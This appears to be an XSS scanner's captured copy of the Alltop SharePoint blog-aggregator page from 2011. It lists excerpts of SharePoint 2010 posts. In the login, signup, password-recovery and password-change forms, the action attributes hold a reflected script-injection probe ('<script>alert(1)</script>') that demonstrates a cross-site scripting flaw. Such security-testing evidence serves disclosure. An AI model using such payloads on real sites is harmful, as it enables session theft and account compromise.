<div class="author">Wictor Wil..n</div>
<div class="published">5 Feb 2011 | 9:49 pm</div>
<div class="entry-content">
<div class="entry-bound">The other day I was setting up another SharePoint 2010 farm and got the usual question to participate in the Customer Experience Improvement Program (CEIP). As always I bailed out of this. Why? Sending information to a third party about my SharePoint farm doesn't appeal me, even if it's Microsoft. You know, they might check how I configure my farm, how I use it etc., and then sit back and laugh at me. Not really, but I think most of us prefer not to send that information to Microsoft. But, this is not my normal standing to the CEIP. I use to participate in it, like when I install new software&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/WictorWilen/~3/CwP-fFJYdhk/Working-with-URLs-in-SharePoint-2010-JavaScripts.aspx" rel="bookmark" target="_blank">Working with URLs in SharePoint 2010 JavaScripts</a></h3>

<div class="full-post">
<div class="author">Wictor Wil..n</div>
<div class="published">2 Feb 2011 | 3:17 pm</div>
<div class="entry-content">
<div class="entry-bound">The SharePoint 2010 user interface relies heavily on JavaScripts, just take a look at the Ribbon which is completely generated by a bunch of JavaScripts. Often customizations of SharePoint also involve JavaScripts. You need it to open modal dialogs, add notifications, create Ribbon Page Components etc. etc.. JavaScript is just one of the programming languages you must know as a SharePoint developer - and you can do amazing stuff with it (just take a look at SPServices by Marc D Anderson). In SharePoint 2010 the SharePoint product team (finally) spent some time making a nice and decent&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/WictorWilen/~3/SKwXqgQAwx4/SharePoint-2010-Ribbon-Controls-Part-8-The-Spinner-Control.aspx" rel="bookmark" target="_blank">SharePoint 2010 Ribbon Controls - Part 8 - The Spinner Control</a></h3>

<div class="full-post">
<div class="author">Wictor Wil..n</div>
<div class="published">1 Feb 2011 | 2:11 am</div>
<div class="entry-content">
<div class="entry-bound">Back again (sorry about the delay) with a new part in the SharePoint 2010 Ribbon Controls series (all parts available here). This time I'm going to show you an interesting control - the Spinner control. What is a Spinner control? The spinner is an up/down (increase/decrease) control with some smart abilities to handle different units. For instance it is used when setting image and table sizes in the default ribbon. The Spinner control has a value (number) and a unit (pixel, percent, points etc.) and three ways to modify the value; manual or using the up and down buttons. Sample Spinner&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/WictorWilen/~3/S1X0cL5jcNQ/Summary-page-of-my-recommended-links-and-tools-for-SharePoint-2010-classes.aspx" rel="bookmark" target="_blank">Summary page of my recommended links and tools for SharePoint 2010 classes</a></h3>

<div class="full-post">
<div class="author">Wictor Wil..n</div>
<div class="published">20 Jan 2011 | 3:07 am</div>
<div class="entry-content">
<div class="entry-bound">I've just published a page, which I plan to update regularly, containing links to web sites, tools, products, solutions, articles, posts, books etc. which I recommend and talk about during my SharePoint 2010 classes. You can find the page here: Class Links If I did promise you during my classes to add a link to it and have forgotten - drop me an e-mail and remind me.</div>
</div>
</div>

</li>
</ul><ul id="feed71914" class="feed-block 037f27901673670f3a98d0ee90c2ee56">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://www.sharepointblog.co.uk/" target="_blank" class="snap_shots">The SharePoint Blog</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://www.sharepointblog.co.uk/2011/03/interesting-ipad-apps.html" rel="bookmark" target="_blank">Interesting iPad apps</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">8 Mar 2011 | 12:35 am</div>
<div class="entry-content">
<div class="entry-bound">Following on from my recent iPad posts (here, here, and here), and ignoring the slightly disappointing (for business users anyway) recent product line refresh, here are a number of applications that you may want to look into:Documents to Go - Office SuiteCreate and read Office Word and Excel and PowerPoint files on your iPad. Also syncs&nbsp;with&nbsp;cloud services likes Google Documents and Dropbox.SharePlus Mobile clientI've covered mobile apps before. SharePlus is the pick of the bunch. Syncing and offline browsing makes it really useful on the move.&nbsp;iTeleportRemote desktop onto you&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://www.sharepointblog.co.uk/2011/03/sharepoint-2010-overview-of-site.html" rel="bookmark" target="_blank">SharePoint 2010 - Overview of site templates</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">7 Mar 2011 | 12:30 am</div>
<div class="entry-content">
<div class="entry-bound">SharePoint 2010 brings with it a number of new site templates. Each comes with a range of&nbsp;functionality&nbsp;to take advantage of, and picking the right template is often a big job in itself. Luckily for us Todd Baginski, a SharePoint MVP, has documented all of the templates over on his blog.Head over here to find out everything you need to know about each template,</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://www.sharepointblog.co.uk/2011/03/sharepoint-2010-ipad-2-and-your.html" rel="bookmark" target="_blank">SharePoint 2010, the iPad 2, and your enterprise</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">1 Mar 2011 | 1:31 am</div>
<div class="entry-content">
<div class="entry-bound">Now I understand that SharePoint is a Microsoft product, and I understand that the iPad is not the natural home for our&nbsp;favorite&nbsp;enterprise collaboration CMS platform, but bear with me. I'm going to write about the iPad and it will all make sense. You see I keep seeing iPads in the businesses I visit to talk about SharePoint. They are creeping into meetings (though when it became OK to tap away on one mid meeting, when a phone is clearly rude, if beyond me) and increasingly they are creeping into requirements documents as well:"The system will be&nbsp;accessible&nbsp;from the CEOs&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://www.sharepointblog.co.uk/2011/03/sharepoint-2010-and-mobile-experience.html" rel="bookmark" target="_blank">SharePoint 2010 and the mobile experience</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">1 Mar 2011 | 12:42 am</div>
<div class="entry-content">
<div class="entry-bound">Something I have touched on a few times is how SharePoint behaves and looks when using a mobile device. I covered SharePoint on the iPhone here back in June last year, and more recently SharePoint 2010 on an iPad. There is also a nice introduction to your mobile options over at CMSWire in this post. It is only a basic overview but it should be enough to get you started if mobile and SharePoint is new to you.</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://www.sharepointblog.co.uk/2011/02/accessing-term-store-as-manager-or.html" rel="bookmark" target="_blank">Accessing the term store as a manager or contributor</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">28 Feb 2011 | 7:51 am</div>
<div class="entry-content">
<div class="entry-bound">I've touched on the term store a few times in posts this year. But as ever the best way to learn a new tool is to get a bit of practical experience. So I came across this little nugget this week when onsite with a client. Firstly a bit of background on the term store.The building blocks of the term store are:Metadata application: Top level container of our term store. Contains groupsGroups: Term sets are collected&nbsp;together&nbsp;in groups&nbsp;Term set: A hierarchical group of related termsTerm: The basic building block of the term store. A metadata wordThe term store can be managed by&hellip;</div>
</div>
</div>

</li>
</ul><ul id="feed72275" class="feed-block 89f197d976935038638ec5f5eb660f65">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://www.sharemuch.com" target="_blank" class="snap_shots">Yaroslav Pentsarskyy on SharePoint Development</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/YaroslavPentsarskyysDevelopmentBlog/~3/59XaBaP64Mo/" rel="bookmark" target="_blank">Tips and Tricks with SharePoint 2010 DataView web part</a></h3>

<div class="full-post">
<div class="author">Yaroslav Pentsarskyy</div>
<div class="published">3 Mar 2011 | 4:07 pm</div>
<div class="entry-content">
<div class="entry-bound">Just today @bsouthby asks me, how do we create a many to many view in SharePoint. Let me clarify. Let&#8217;s say we have a list called Projects and a list called Resources. You can add new resources and new projects to both lists. You would like to reference Resources in Projects. You also want to be able to see Projects when you view a particular Resource. Let&#8217;s see how we can set it up with no code using DataView webpart and SharePoint Designer 2010. 1. Create a custom list called Projects; Create a custom list called Resources 2. Access list settings in Projects and create new&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/YaroslavPentsarskyysDevelopmentBlog/~3/gt39jHIsSsY/" rel="bookmark" target="_blank">SharePoint FAST Search Server technical features demo</a></h3>

<div class="full-post">
<div class="author">Yaroslav Pentsarskyy</div>
<div class="published">25 Feb 2011 | 11:12 am</div>
<div class="entry-content">
<div class="entry-bound">If you heard about SharePoint FAST search you probably want to know what&#8217;s different between this product and out of the box SharePoint 2010 Enterprise search. This technical demo will go over main features one by one and demonstrate the differences and configurations involved with setting some of the features up. We&#8217;re talking about: 1. Visual Best Bets 2. Search enhancements based on user context 3. Custom properties 4. Property extraction 5. Query suggestions 6. Similar results 7. Sort results on managed properties or rank profiles 8. Relevancy tuning by document or site&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/YaroslavPentsarskyysDevelopmentBlog/~3/juXZIoa8BFc/" rel="bookmark" target="_blank">Adding related searches in SharePoint 2010 search</a></h3>

<div class="full-post">
<div class="author">Yaroslav Pentsarskyy</div>
<div class="published">23 Feb 2011 | 3:10 pm</div>
<div class="entry-content">
<div class="entry-bound">Yesterday, we looked at how you can add new suggested keywords to SharePoint 2010 search allowing users to pick the most popular keyword before they execute a search query. You can also suggest for users to search for a new term based on the results from the executed query. This can be achieved by using Related Queries or Related Searches web part. By default, the list of related searches will be populated the same way query suggestions get populated &#8211; when users click 6 or more times on the search result from the search keyword they searched for. If you want to test the functionality&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/YaroslavPentsarskyysDevelopmentBlog/~3/fvXXvkTgKws/" rel="bookmark" target="_blank">How To Customize Search Refiners In SharePoint 2010</a></h3>

<div class="full-post">
<div class="author">Yaroslav Pentsarskyy</div>
<div class="published">22 Feb 2011 | 9:51 am</div>
<div class="entry-content">
<div class="entry-bound">Yesterday Ron and I had a quick chat on how you can leverage SharePoint 2010 out-of-the-box search refinement capabilities. Here are the details on how to add your own refiner categories Enjoy!</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/YaroslavPentsarskyysDevelopmentBlog/~3/wXB1a2g9riU/" rel="bookmark" target="_blank">Adding new keyword suggestions to FAST Search and SharePoint 2010 Search</a></h3>

<div class="full-post">
<div class="author">Yaroslav Pentsarskyy</div>
<div class="published">21 Feb 2011 | 2:34 pm</div>
<div class="entry-content">
<div class="entry-bound">One of the new features in SharePoint 2010 and FAST Search for SharePoint is keyword suggestions when users type their query. By default SharePoint will add new seach suggestion..when the search term was searched for and result was clicked on 6 times in a year. You can however define a list of initial search suggestions using PowerShell. 1. Open SharePoint 2010 Management Shell 2. Create a new keyword suggestion by executing: New-SPEnterpriseSearchLanguageResourcePhrase -Language en-us -Type QuerySuggestionAlwaysSuggest -SearchApplication "FastQuery" -Name "my keyword" In here the FastQuery&hellip;</div>
</div>
</div>

</li>
</ul><div class="row-clear">&nbsp;</div>
<ul id="feed72552" class="feed-block 0ea26787bb60c28786adb52a2b4d6e87">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://www.officeandbusiness.be" target="_blank" class="snap_shots">SharePoint, GTD and beyond</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://www.officeandbusiness.be/2011/02/17/best-practices-on-working-with-documents-and-sharepoint/" rel="bookmark" target="_blank">Best practices on working with documents and SharePoint.</a></h3>

<div class="full-post">
<div class="author">Patrick Sledz</div>
<div class="published">17 Feb 2011 | 2:11 pm</div>
<div class="entry-content">
<div class="entry-bound">When you work with documents there are some best practices, and it will make yours and your colleague&#8217;s collaborative life a lot easier when you follow these simple guidelines. In this post I&#8217;ll try to explain what you better try to avoid when you work with documents and SharePoint. Whenever it is possible, I also advice you what to do 1. Give your document a reasonable filename, avoid long filenames. Use the TITLE field in the office applications to give your document a title (and subtitle and keywords, .) The title column can be used in a view in a library. You can get to the&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://www.officeandbusiness.be/2011/02/08/how-to-add-a-google-or-bing-map-to-your-collaboration-site/" rel="bookmark" target="_blank">How to add a Google or Bing map to your Collaboration Site</a></h3>

<div class="full-post">
<div class="author">Patrick Sledz</div>
<div class="published">8 Feb 2011 | 5:50 am</div>
<div class="entry-content">
<div class="entry-bound">In this article I will explain you how you can add a Google or Bing map to your Collaboration site. Actually, you can use this for all kinds of sources. Prerequisite: You need to have Site Owner rights to modify pages (adding web parts) The first thing you need to do is to add a Content Editor WebPart Click on Site Actions and then on Edit Page Select the Web Part zone where you want to display the map Scroll down to the Miscellaneous section and select the Content Editor Web Part and press ADD Then click on the Edit / Modify Shared Web Part In the right part of your screen the you&#8217;ll&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://www.officeandbusiness.be/2011/01/27/using-filtering-in-the-dataviewwebpart/" rel="bookmark" target="_blank">Using filtering in the DataviewWebPart</a></h3>

<div class="full-post">
<div class="author">Patrick Sledz</div>
<div class="published">27 Jan 2011 | 5:57 am</div>
<div class="entry-content">
<div class="entry-bound">As a result of the great interaction of the SharePoint community on twitter, I created this blog entry. 140 characters are definitely not enough to ask my questions, and Stump The panel doesn&#8217;t allow screenshot (I think). The content I provide is fictive, but the setup is real J. Please note, that the screenshots are from the test environment, and I blurred some thing due to confidentiality. My current setup. We&#8217;re working with MOSS 2007. There is a site collection with a root site, let&#8217;s call it rootsite. Under the rootsite, there are several subsites, let&#8217;s call them&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://www.officeandbusiness.be/2011/01/20/what-i-intend-to-ship-in-2011/" rel="bookmark" target="_blank">What I intend to ship in 2011.</a></h3>

<div class="full-post">
<div class="author">Patrick Sledz</div>
<div class="published">20 Jan 2011 | 12:03 pm</div>
<div class="entry-content">
<div class="entry-bound">A new year, which has already been there for about 3 weeks, now gives me the opportunity to set some goals. While you could also do this on another date, the New Year seems to be the perfect timing for New years resolutions. I didn&#8217;t document my shipping list for 2010 so I can&#8217;t do a retrospective, but I&#8217;ll not make that mistake twice. So for all my loved ones, all people that know me, and also all readers of my blog I will have a shipping list for 2011. But it will be a SMART Shipping List. SMART stands for Specific Measurable Achievable Relevant Time bound While I know not&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://www.officeandbusiness.be/2011/01/14/how-to-display-the-week-number-in-a-sharepoint-calendar/" rel="bookmark" target="_blank">How to display the week number in a SharePoint calendar</a></h3>

<div class="full-post">
<div class="author">Patrick Sledz</div>
<div class="published">14 Jan 2011 | 7:58 am</div>
<div class="entry-content">
<div class="entry-bound">I would like to display the week number in a calendar month view. I searched on Bing and google for a while, but all I could find was how to display the week number in a date picker. Here is a screenshot of what I would like to have (or something similar) : Update1 After Marc D Anderson commented with how to figure out where to place and calculate the week. This is the screenshot what happens to your date picker after you enabled the &#8220;Show week numbers in the Data Navigator&#8221; in your sites Regional Settings. So the answer to these questions is somewhere in this screenshot J &nbsp;</div>
</div>
</div>

</li>
</ul><ul id="feed72773" class="feed-block 89f197d976935038638ec5f5eb660f65">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://www.sharemuch.com" target="_blank" class="snap_shots">Yaroslav on SharePoint</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/YaroslavPentsarskyysDevelopmentBlog/~3/59XaBaP64Mo/" rel="bookmark" target="_blank">Tips and Tricks with SharePoint 2010 DataView web part</a></h3>

<div class="full-post">
<div class="author">Yaroslav Pentsarskyy</div>
<div class="published">3 Mar 2011 | 4:07 pm</div>
<div class="entry-content">
<div class="entry-bound">Just today @bsouthby asks me, how do we create a many to many view in SharePoint. Let me clarify. Let&#8217;s say we have a list called Projects and a list called Resources. You can add new resources and new projects to both lists. You would like to reference Resources in Projects. You also want to be able to see Projects when you view a particular Resource. Let&#8217;s see how we can set it up with no code using DataView webpart and SharePoint Designer 2010. 1. Create a custom list called Projects; Create a custom list called Resources 2. Access list settings in Projects and create new&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/YaroslavPentsarskyysDevelopmentBlog/~3/gt39jHIsSsY/" rel="bookmark" target="_blank">SharePoint FAST Search Server technical features demo</a></h3>

<div class="full-post">
<div class="author">Yaroslav Pentsarskyy</div>
<div class="published">25 Feb 2011 | 11:12 am</div>
<div class="entry-content">
<div class="entry-bound">If you heard about SharePoint FAST search you probably want to know what&#8217;s different between this product and out of the box SharePoint 2010 Enterprise search. This technical demo will go over main features one by one and demonstrate the differences and configurations involved with setting some of the features up. We&#8217;re talking about: 1. Visual Best Bets 2. Search enhancements based on user context 3. Custom properties 4. Property extraction 5. Query suggestions 6. Similar results 7. Sort results on managed properties or rank profiles 8. Relevancy tuning by document or site&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/YaroslavPentsarskyysDevelopmentBlog/~3/juXZIoa8BFc/" rel="bookmark" target="_blank">Adding related searches in SharePoint 2010 search</a></h3>

<div class="full-post">
<div class="author">Yaroslav Pentsarskyy</div>
<div class="published">23 Feb 2011 | 3:10 pm</div>
<div class="entry-content">
<div class="entry-bound">Yesterday, we looked at how you can add new suggested keywords to SharePoint 2010 search allowing users to pick the most popular keyword before they execute a search query. You can also suggest for users to search for a new term based on the results from the executed query. This can be achieved by using Related Queries or Related Searches web part. By default, the list of related searches will be populated the same way query suggestions get populated &#8211; when users click 6 or more times on the search result from the search keyword they searched for. If you want to test the functionality&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/YaroslavPentsarskyysDevelopmentBlog/~3/fvXXvkTgKws/" rel="bookmark" target="_blank">How To Customize Search Refiners In SharePoint 2010</a></h3>

<div class="full-post">
<div class="author">Yaroslav Pentsarskyy</div>
<div class="published">22 Feb 2011 | 9:51 am</div>
<div class="entry-content">
<div class="entry-bound">Yesterday Ron and I had a quick chat on how you can leverage SharePoint 2010 out-of-the-box search refinement capabilities. Here are the details on how to add your own refiner categories Enjoy!</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/YaroslavPentsarskyysDevelopmentBlog/~3/wXB1a2g9riU/" rel="bookmark" target="_blank">Adding new keyword suggestions to FAST Search and SharePoint 2010 Search</a></h3>

<div class="full-post">
<div class="author">Yaroslav Pentsarskyy</div>
<div class="published">21 Feb 2011 | 2:34 pm</div>
<div class="entry-content">
<div class="entry-bound">One of the new features in SharePoint 2010 and FAST Search for SharePoint is keyword suggestions when users type their query. By default SharePoint will add new seach suggestion..when the search term was searched for and result was clicked on 6 times in a year. You can however define a list of initial search suggestions using PowerShell. 1. Open SharePoint 2010 Management Shell 2. Create a new keyword suggestion by executing: New-SPEnterpriseSearchLanguageResourcePhrase -Language en-us -Type QuerySuggestionAlwaysSuggest -SearchApplication "FastQuery" -Name "my keyword" In here the FastQuery&hellip;</div>
</div>
</div>

</li>
</ul>        
       </div>
   </div>
</div>

<div id="footer" class="clearfix">    <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved.</p>        <p class="navigation">        <a href="http://alltop.com/about/">About</a> &middot;        <a href="http://alltop.com/advertising/">Advertising</a> &middot;        <a href="http://alltop.com/submission/">Submissions</a> &middot;        <a href="http://alltop.com/contact-us/">Contact Us</a> &middot;        <a href="http://blog.alltop.com/">Blog</a> &middot;        <a href="http://alltop.com/goodies/">Goodies</a> &middot;        <a href="http://alltop.com/legal/" rel="nofollow">Legal</a>    </p>        <p class="site-credits">Powered by <a href="http://www.rackspace.com" target="_blank">a Rackspace Dedicated Server</a> &middot;    Inspired by <a href="http://popurls.com" target="_blank">popurls</a> &middot;    Site by <a href="http://electricpulp.com" target="_blank" rel="cool">Electric Pulp</a>    </p></div>
<script type="text/javascript" charset="utf-8">        function signup_form_submit() {        var f = $('the-signup-form');        f.ajax.value=1;        new Ajax(f.action, {            method: 'post',            data: $('the-signup-form'),            onRequest: function(){            },            onComplete: function(response){                if (response==0) {                    $('sign-up-form-html').effect('opacity', {                        duration: 500,                        fps: 75,                        onComplete: function(){                            $('sign-up-form-html').style.display = 'none';                            $('sign-up-form-message').style.display = 'block';                            $('sign-up-form-message').effect('opacity', {                                duration: 500,                                fps: 75                            }).start(1);                        }                    }).start(0);                }                else {                    alert(response);                }            },            onFailure: function(){            }        }).request();    }    function password_change_form_submit() {        var f = $('the-password-change-form');        f.ajax.value=1;        new Ajax(f.action, {            method: 'post',            data: $('the-password-change-form'),            onRequest: function(){            },            onComplete: function(response){                if (response==0) {                    $('password-change-form-html').effect('opacity', {                        duration: 500,                        fps: 75,                        onComplete: function(){                            $('password-change-form-html').style.display = 'none';                            $('password-change-form-message').style.display = 'block';                            $('password-change-form-message').effect('opacity', {                                duration: 500,                                fps: 75                            }).start(1);                        }                    }).start(0);                }                else {                    alert(response);                }            },            onFailure: function(){            }        }).request();    }    var shown_form_id = null;    function show_form(form_el_id) {        var sout = false;        if ($(form_el_id).style.display == 'block') {            sout = true;        }        $('slide-wrapper').style.display='block';        $('log-in').style.display='none';        $('sign-up').style.display='none';        $('password-recovery').style.display='none';        $('password-change').style.display='none';        $(form_el_id).style.display='block';        if (sout) {            accountsSlider.slideOut();            window.setTimeout(function(){                $(form_el_id).style.display='none';                $('slide-wrapper').style.top='-190px';                $('slide-wrapper').style.zIndex='0';            }, 550);            shown_form_id = null;        }        else {            scroller.toTop();            $('slide-wrapper').style.top='0px';            $('slide-wrapper').style.zIndex='111';            accountsSlider.slideIn();            shown_form_id = form_el_id;        }    }    var accountsSlider;    var scroller;    var load_method = (window.ie ? 'load' : 'domready');    window.addEvent(load_method, function(){        accountsSlider = new Fx.Slide('account-forms', {duration: 500});        accountsSlider.hide();        $('account-forms').style.visibility = 'visible';        scroller = new Fx.Scroll($$('body')[0], {            wait: false,            duration: 500,            transition: Fx.Transitions.Quad.easeInOut        });    });// ]]> --></script><div id="slide-wrapper">    <div id="account-forms" class="clearfix" style="visibility:hidden;">            <div id="log-in">                        <div id="login-form">                <form action="/favicon.icoa6c4d"><script>alert(1)</script>365c9a34273" method="post" accept-charset="utf-8">                    <input type="hidden" name="act" value="login" />                    <p>Log in to your site, or create an <a href="#" onclick="show_form('sign-up');return false;">account</a>. </p>                                        <div class="form-row">                        <label>Username or Email</label>                        <input type="text" name="username" value="" id="f-username" tabindex="1" class="styled"/>                    </div>                    <div class="form-row">                        <span><a href="#" onclick="show_form('password-recovery'); return false;">password lookup</a></span>                        <label>Password</label>                        <input type="password" name="password" value="" id="f-password" tabindex="2" class="styled"/>                    </div>                    <div class="form-bttn">                        <input type="image" src="/img/bttn-login.gif" tabindex="3"/>                        <a href="#" onclick="show_form(shown_form_id); return false;" class="close-window">cancel</a>                    </div>                </form>            </div>            <div class="instructions">                <p>Once you've logged in, look for the + icon throughout your favorite Alltop topics. Click it to add that site to your personal MyAlltop page.</p>                </div>        </div>                <div id="sign-up">                                <div id="sign-up-form">                <div id="sign-up-form-html">                    <form action="/favicon.icoa6c4d"><script>alert(1)</script>365c9a34273" method="post" accept-charset="utf-8" id="the-signup-form" onsubmit="signup_form_submit();return false;">                        <input type="hidden" name="act" value="new" />                        <input type="hidden" name="ajax" value="0" />                        <p>Create a new account. Or <a href="#" onclick="show_form('log-in');return false;">log in</a>.</p>                                                <div class="form-row">                            <span>this will also be used as your url.</span>                            <label>Username</label>                            <input type="text" name="username" id="su-username" value="" class="styled" />                        </div>                        <div class="form-row">                            <span>this is for verification purposes.</span>                            <label>Email</label>                            <input type="text" name="email" value="" class="styled" />                        </div>                        <div class="form-row">                            <label>Password</label>                            <input type="password" name="password" value="" class="styled" />                        </div>                        <div class="form-row">                            <label>Password, again</label>                            <input type="password" name="password2" value="" class="styled" />                        </div>                        <div class="form-checkbox-row">                            <input type="checkbox" name="confirm-tos" value="1" id="confirm-tos" />                            <small>I have read and agree to the <a href="http://alltop.com/terms-of-use/" target="_new">terms of use</a>.</small>                        </div>                            <div class="form-bttn">                            <input type="image" src="/img/bttn-signup.gif" />                            <a href="#" onclick="show_form(shown_form_id); return false;" class="close-window">cancel</a>                        </div>                    </form>                </div>                <div id="sign-up-form-message" style="display:none;">                                    <h3>Your MyAlltop account awaits.</h3>                        <p>Check your inbox for your activation email. Once you've confirmed your email address, you'll be able to start adding feeds and sharing your custom url.</p>                    <p><a href="#" onclick="show_form(shown_form_id); return false;">Close</a></p>                                </div>            </div>                    </div>                <div id="password-recovery" style="display:none">                        <div id="password-recovery-form">                <form action="/favicon.icoa6c4d"><script>alert(1)</script>365c9a34273" method="post" accept-charset="utf-8">                    <input type="hidden" name="act" value="password" />                    <p>Need help with your password?</p>                                        <div class="form-row">                        <label>Username</label>                        <input type="text" name="username" value="" class="styled"/>                    </div>                    <div class="form-row">                        <label>Email</label>                        <input type="text" name="email" value="" class="styled"/>                    </div>                    <div class="form-bttn">                        <input type="image" src="/img/bttn-send.gif"/>                        <a href="#" onclick="show_form(shown_form_id); return false;" class="close-window">cancel</a>                    </div>                </form>            </div>            <div class="instructions">                <p>Once you've completed the information above, we'll send you your password.</p>                </div>        </div>                <div id="password-change">                                <div id="password-change-form">                <div id="password-change-form-html">                    <form action="/favicon.icoa6c4d"><script>alert(1)</script>365c9a34273" method="post" accept-charset="utf-8" id="the-password-change-form" onsubmit="password_change_form_submit();return false;">                        <input type="hidden" name="act" value="change" />                        <input type="hidden" name="ajax" value="0" />                        <input type="hidden" name="username" value="" />                        <p>Change your password. Note: your password should be at least 6 characters.</p>                                                <div class="form-row">                            <label>Current password</label>                            <input type="password" name="password" value="" class="styled" />                        </div>                        <div class="form-row">                            <label>New password</label>                            <input type="password" name="password_new" value="" class="styled" />                        </div>                        <div class="form-row">                            <label>New password, again</label>                            <input type="password" name="password2_new" value="" class="styled" />                        </div>                        <div class="form-bttn">                            <input type="image" src="/img/bttn-submit.gif" />                            <a href="#" onclick="show_form(shown_form_id); return false;" class="close-window">cancel</a>                        </div>                    </form>                </div>                <div id="password-change-form-message" style="display:none;">                                    <h3>Your MyAlltop password has been changed.</h3>                    <p><a href="#" onclick="show_form(shown_form_id); return false;">Close</a></p>                                </div>            </div>                    </div>            </div></div>
           <div id="wrap-bttns">
               <div id="bttn-bar">
               
                           
                   <a href="#" onclick="show_form('log-in');$('f-username').focus(); return false;" id="auth-log-in" class="auth-bttn">Log in</a>
                   
                                   
                   <div id="tweetmeme">
                       <script type="text/javascript">
                       tweetmeme_source = 'alltop';
                       tweetmeme_style = 'compact';
                       </script>
                       <script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
                   </div>
               
                   <script>function fbs_click() {u=location.href;t=document.title;window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}</script><a href="http://www.facebook.com/share.php?u=sharepoint.alltop.com" onclick="return fbs_click()" target="_facebook" class="share-facebook" title="Share on Facebook">Share on Facebook</a>
               </div>
           </div>
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/alltop'></script>
<!-- FM Tracking Pixel -->

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-1701157-4");
pageTracker._setDomainName(".alltop.com");
pageTracker._trackPageview();
pageTracker._trackEvent('Alltop-Category', 'tech');
} catch(err) {}</script>

<script type="text/javascript" charset="utf-8">
   window.addEvent('load', function(){
       $$('a').each(function(el){
           el.addEvent('click', function(e){
               if (!el.href.match(/alltop\.com/i) && el.href.match(/^https?:\/\/(www\.)?/i)) {
                   var offlink = el.href.replace(/^https?:\/\/(www\.)?/i, '');
                   pageTracker._trackPageview('/outgoing/'+offlink);
               }
           });
       });
   });
</script>

   <!-- Start Quantcast tag -->
   <script type="text/javascript">
   _qoptions={
   qacct:"p-2bN4gyxORyvnw"
   };
   </script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
   <noscript>
   <img src="http://pixel.quantserve.com/pixel/p-2bN4gyxORyvnw.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
   </noscript>
   <!-- End Quantcast tag -->


</body>
</html>

Report generated by XSS.CX at Wed Mar 09 13:41:59 CST 2011.